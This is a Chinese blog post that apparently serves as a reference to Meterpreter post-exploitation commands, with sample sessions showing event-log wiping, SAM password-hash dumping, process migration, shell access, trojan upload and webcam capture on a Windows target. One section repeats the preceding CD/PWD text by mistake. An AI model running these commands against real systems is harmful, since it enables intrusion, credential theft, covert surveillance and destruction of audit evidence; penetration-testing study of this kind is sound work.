Spwpun's Blog
0%

meterpreter常用命令

Posted on Edited on In Views: Valine:

METERPRETER命令用法

所有的命令都会涉及到,若没有,实践是检验的唯一标准。

HELP

展示帮助菜单:

1
2
3
4
5
6
7
8
9
10
11
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    channel       Displays information about active channels
...snip...

BACKGROUND

把当前session放到后台,然后返回‘msf’提示的命令行,如果要返回session,使用sessions命令选择:

1
2
3
4
5
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

CAT

查看文件内容:

1
2
3
4
5
6
7
8
meterpreter > cat
Usage: cat file

Example usage:
meterpreter > cat edit.txt
What you talkin' about Willis

meterpreter >

CD AND PWD

切换目录,查看当前目录:

参数:

1
2
cd:	Path of the folder to change to
pwd:	None required

示例:

1
2
3
4
5
6
meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >

CLEAREV

清除Windows上的日志,(Clear Event),Windows上的日志可以使用事件查看器(Event Viewer)来查看:

1
2
cd:	Path of the folder to change to
pwd:	None required

Example usuage:

1
2
3
4
5
6
meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >

CLEAREV

The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments.

Before using Meterpreter to clear the logs | Metasploit Unleashed

上面是没有使用clearev命令清除前。

用法:

1
2
3
4
5
meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter >

After using Meterpreter to clear the logs | Metasploit Unleashed

上图是清除后的Windows系统日志。

DOWNLOAD

从目标机上下载文件,注意路径需要使用两个反斜杠:

1
2
3
4
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

EDIT

使用vim 编辑文件:

示例:

1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
.
...snip...
.
100666/rw-rw-rw-  0       fil   2012-03-01 13:47:10 -0500  edit.txt

meterpreter > edit edit.txt

查看更高级的用法.http://www.vim.org/

EXECUTE

在目标机器上执行命令:

1
2
3
4
5
6
7
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GETUID

返回目标主机的服务器名字:

1
2
3
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

HASHDUMP

dump出Windows上SAM数据库的内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >

IDLETIME

返回远程主机用户在线的时长:

1
2
3
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

IPCONFIG

查看远程主机的网络配置情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0

meterpreter >

LPWD AND LCD

查看本地的当前目录和改变本地的目录,即攻击者的目录:

参数:

1
2
lpwd:		None required
lcd:		Destination folder

示例:

1
2
3
4
5
6
7
8
9
10
11
meterpreter > lpwd
/root

meterpreter > lcd MSFU
meterpreter > lpwd
/root/MSFU

meterpreter > lcd /var/www
meterpreter > lpwd
/var/www
meterpreter >

LS

列出远程主机当前目录下的文件:

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > ls

Listing: C:\Documents and Settings\victim
=========================================

Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...

MIGRATE

注入到另外一个进程中去:

1
2
3
4
5
6
7
8
meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

PS

列出目标当前正在运行的进程:

1
2
3
4
5
6
7
8
9
10
11
meterpreter > ps

Process list
============

    PID   Name                  Path
    ---   ----                  ----
    132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    288   snmp.exe              C:\WINDOWS\System32\snmp.exe
...snip...

RESOURCE

resource 命令会一行一行地执行文本文件里的meterpreter命令,默认情况下,命令是在目标机的当前目录下执行,而resource文件则是在攻击机本地工作目录下。

1
2
3
meterpreter > resource 
Usage: resource path1 path2Run the commands stored in the supplied files.
meterpreter >

参数:

1
2
path1:		包含要执行的命令的文件的位置
Path2Run:	在文件中找到的执行命令的位置

示例
使用的resource文件如下:

1
2
3
4
root@kali:~# cat resource.txt
ls
background
root@kali:~#

执行resource命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
meterpreter> > resource resource.txt
[*] Reading /root/resource.txt
[*] Running ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2012-02-29 16:41:29 -0500  .
40777/rwxrwxrwx   0       dir   2012-02-02 12:24:40 -0500  ..
100666/rw-rw-rw-  606     fil   2012-02-15 17:37:48 -0500  IDA Pro Free.lnk
100777/rwxrwxrwx  681984  fil   2012-02-02 15:09:18 -0500  Sc303.exe
100666/rw-rw-rw-  608     fil   2012-02-28 19:18:34 -0500  Shortcut to Ability Server.lnk
100666/rw-rw-rw-  522     fil   2012-02-02 12:33:38 -0500  XAMPP Control Panel.lnk

[*] Running background

[*] Backgrounding session 1...
msf  exploit(handler) >

在目标机上搜索具体的文件,可以在整个系统中搜索,也可以在指定的目录下搜索,在创建文件模式时可以使用通配符。

1
2
meterpreter > search
[-] You must specify a valid file glob to search for, e.g. >search -f *.doc

参数:

1
2
File pattern:	 	May contain wildcards
Search location:	Optional, if none is given the whole system will be searched.

示例:

1
2
3
4
5
6
7
meterpreter > search -f autoexec.bat
Found 1 result...
    c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
    c:\\xampp\perl\bin\search.bat (57035 bytes)
meterpreter >

SHELL

返回目标机上的一个标准的shell:

1
2
3
4
5
6
7
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

UPLOAD

上传文件到目标机上,同download 命令一样在路径中需要使用两个反斜杠:

1
2
3
4
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

WEBCAM_LIST

列出当前目标机器上可用的Webcam设备。

示例:

1
2
3
4
meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
meterpreter >

WEBCAM_SNAP

利用已连接的webcam设备在目标机上截屏并以随机文件名的jpg格式保存在本地当前工作目录。

1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.

OPTIONS:

    -h      Help Banner
    -i   要使用的webcam设备的编号(Default: 1)
    -p   jpg图片的路径 (Default: 'gnFjTnzi.jpeg')
    -q   jpg图片的质量 (Default: '50')
    -v   是否自动查看图片 (Default: 'true')

meterpreter >

选项:

1
2
3
4
5
6
-h:	Displays the help information for the command
-i opt:	If more then 1 web cam is connected, use this option to select the device to capture the
        image from
-p opt:	Change path and filename of the image to be saved
-q opt:	The imagine quality, 50 being the default/medium setting, 100 being best quality
-v opt:	By default the value is true, which opens the image after capture.

示例:

1
2
3
4
5
6
meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
meterpreter >